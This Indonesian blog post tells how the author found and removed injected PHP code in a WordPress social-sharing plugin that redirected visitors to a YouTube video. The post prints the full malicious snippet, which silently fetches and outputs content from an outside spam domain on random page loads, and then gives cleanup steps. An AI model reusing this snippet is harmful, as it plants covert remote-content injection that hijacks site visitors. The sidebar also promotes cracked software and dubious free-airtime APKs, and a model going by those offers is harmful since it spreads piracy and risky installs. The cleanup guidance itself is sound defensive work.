Cara remove redirect link ke video youtube

Deal Score0

remove redirect link ke video youtubeRemove redirect link ke video youtube – Beberapa hari ini trafik blog CahBorneo agak menurun. Selidik punya selidik ternyata salah satu penyebabnya adalah adanya redirect link ke video Justin Bieber di youtube ( http:// www.youtube.com/watch?v=RFngSCaY5nA ). Video ini muncul pada tab baru ketika link yang ada pada blog ini di klik. Mungkin diantara Anda pengunjung blog CahBorneo ini pernah mengalaminya. Pada kesempatan kali ini saya mohon maaf, atas ketidaknyamanan ini. Namun terus terang ini bukanlah ulah dari admin 😀 melainkan ada yang “usil” dengan menambahkan Injection Code List pada blog ini.

Kejadian ini juga menjadi pelajaran bagi saya untuk lebih berhati-hati. Dengan kejadian ini saya menjadi tau dan bisa memberikan informasi kepada Anda bagaimana cara menghapus (remove redirect link ke video youtube) kode injection ini. Kok jadi curhat.. hehehe..

Remove redirect link ke video youtube

Setelah di cari ternyata di dalam salah satu file PHP pada plugin ini terdapat kode CPT Code Injection seperti ini:

<?php if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists(‘curl_init’)){$addressd = “http://spamcheckr.com/l.php”;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’sec14545chesk’);}} ?>

Kode diatas jika terdapat dalam file php blog Anda maka secara otomatis akan meredirect (mengarah) pada video Justin Bieber. Dan parahnya lagi, jika kita buka alamat http://spamceckr.com pada browser atau alamat lainnya, juga akan di redirect ke video tersebut. Itu pengalaman saya. 😀

Cara remove redirect link ke video youtube

Bagaimana mengatasi hal ini? Ternyata cukup mudah untuk melakukan remove redirect link ke video youtube Justin Bieber ini yaitu dengan mencari kode seperti yang saya sebutkan diatas dan menghapusnya. Silahkan ikuti Code Injection Tutorial langkah-langkahnya :

  1. Download dan Instal tools FileSeek. Tools ini berfungsi untuk mencari karakter yang ada dalam sebuah file bahkan folder, bukan mencari nama file seperti yang telah ada pada fitur windows search.
  2. Download semua file yang ada pada website Anda. Anda bisa menggunakan Filezilla atau dengan cara backup dulu melalui cPanel kemudian di download.
  3. Setelah file website Anda selesai terdownload, saatnya melakukan pencarian mengunakan tool FileSeek.
  4. Masukkan kata kunci “spamcheckr” tanpa tanda petik.
  5. Setelah ditemukan, lihat file php mana yang terinjeksi (bisa pada plugin atau juga pada theme).Pada kasus saya, code injeksi terdapat pada file essb.php yang berada pada folder Easy-Social-Share-Button/lib/essb.php
  6. Login ke cPanel blog Anda, dan temukan file yang terinjeksi tersebut.
  7. Hapus kode injection tersebut mulai dari tag <?php hingga ?> (Penting!. Yang dihapus hanya kode injeksinya, bukan semua kode yang ada dalam file yang terinjeksi tersebut)
  8. Jika diperlukan, cari juga link redirect video Justin Biebernya.
  9. Masukkan kata kunci “watch?v=RFngSCaY5nA” tanpa tanda petik. Jika ketemu, hapus saja. Bila tidak ditemukan ya tidak apa-apa.

Video tutorial remove redirect link ke video youtube

Masih bingung dengan penjelasan diatas, silahkan lihat video tutorial dibawah ini untuk remove redirect link ke video youtube.

Tutorial cara remove redirect link ke video youtube justin bieber ini saja yang ingin saya share. Bila ada yang ingin disampaikan, silahkan komentar. Atau bila Anda punya cara yang lebih efektif, silahkan dishare “D

Update artikel dari blog ini selalu saya bagikan (share) di Facebook Fans Page, Twitter dan Google Plus. Silahkan follow saya agar tidak ketinggalan info updatenya!

Leave a Reply

11 Comments on "Cara remove redirect link ke video youtube"

Notify of
avatar
Sort by:   newest | oldest | most voted
idham
Guest

makasih gan, web ane saya baru terperiksa kena redirect ini juga nih. Yang bikin bete dia redirectnya secara random gitu ..

pas diperiksa ada satu plugin yang memang ada script ini, mudah2an normal setelah di remove nih

Belle
Guest

This is really interesting, You are a very
skilled blogger. I’ve joined your rss feed and look forward to seeking more of your
great post. Also, I’ve shared yoour site in my social networks!

Very Prive Louboutin
Guest

Nice blog here! Also your site loads up fast!
What host are you using? Can I get your affiliate link to your host?

I wish my web site loaded up as quickly as yours lol

Nike Air Jordan Flight
Guest

Hi, i read your blog occasionally and i own a similar one and i was just wondering
if you get a lot of spam remarks? If so how do you reduce it, any plugin or anything you can suggest?
I get so much lately it’s driving me insane so any assistance is very
much appreciated.

Jogging Jordan
Guest

Very good write-up. I absolutely appreciate this site.

Keep writing!

Purnama
Guest

Sangat menjengkelkan ya. Beberapa image sy pernah redirect ke url lain. Terpaksa deh hapus tu gambar.
Nice post gan

wpDiscuz
CahBorneo.Com
Register New Account
Reset Password
pulsa gratis
Mau PULSA GRATIS Kayak Gini?
Simple caranya, Gan!
* Siapkan Hp Android Anda
* Download dan Pasang apknya
* Geser-geser layar anda
* Bila perlu, ajak teman anda
* Itu saja!
SCAN atau KLIK gambar dibawah untuk memasang apknya!
pulsa gratis
SHARE
OR
SUBSCRIBE
atau
verifikasi paypal 2016 gratis
HOT!! Cara verifikasi Paypal Terbaru 2016 dengan kartu ATM Permata Bank

BACA DISINI!
GET IT NOW
FREE BACKLINK DOFOLLOW LINKS
TIPS & TRICK
SEARCH ENGINE OPTIMIZATION
A P K
FREE PREMIUM APK
MONEY
MAKE MONEY ONLINE
KEYS
ANTIVIRUS
AND MORE...
LIKE THIS PAGE TO GET UPDATES
Update terbaru selalu saya posting di Facebook Page saya. Silahkan klik Like tombol disamping agar tidak ketinggalan info update.
Info
Update IDM terbaru!
idm full crack
IDM 6.26 Build 14
Edisi 30 November 2016
Download update IDM full terbaru tanpa register gratis.
Smadav Rev. 11.0
UPDATE SMADAV PRO!
Dan penyempurnaan lainnya
Penyempurnaan fitur startup Smadav
Perbaikan gagal install pada Windows XP
Penambahan database 230 virus baru
Perbaikan kesalahan deteksi
Info
Daftar Backlinks Terbaru
idm full crack
Edisi Agustus 2016
Follow Fans Page CahBorneo.Com untuk mendapatkan update terbaru
pulsa gratis
Mau PULSA GRATIS Kayak Gini?!
Simple caranya, Gan!
* Siapkan Hp Anda
* Install APKnya
* Lakukan tugas (geser, lihat or install)
* Bila perlu, ajak teman
* Itu saja!
SCAN kode batang (QR Code) dibawah lalu install APKnya!
pulsa gratis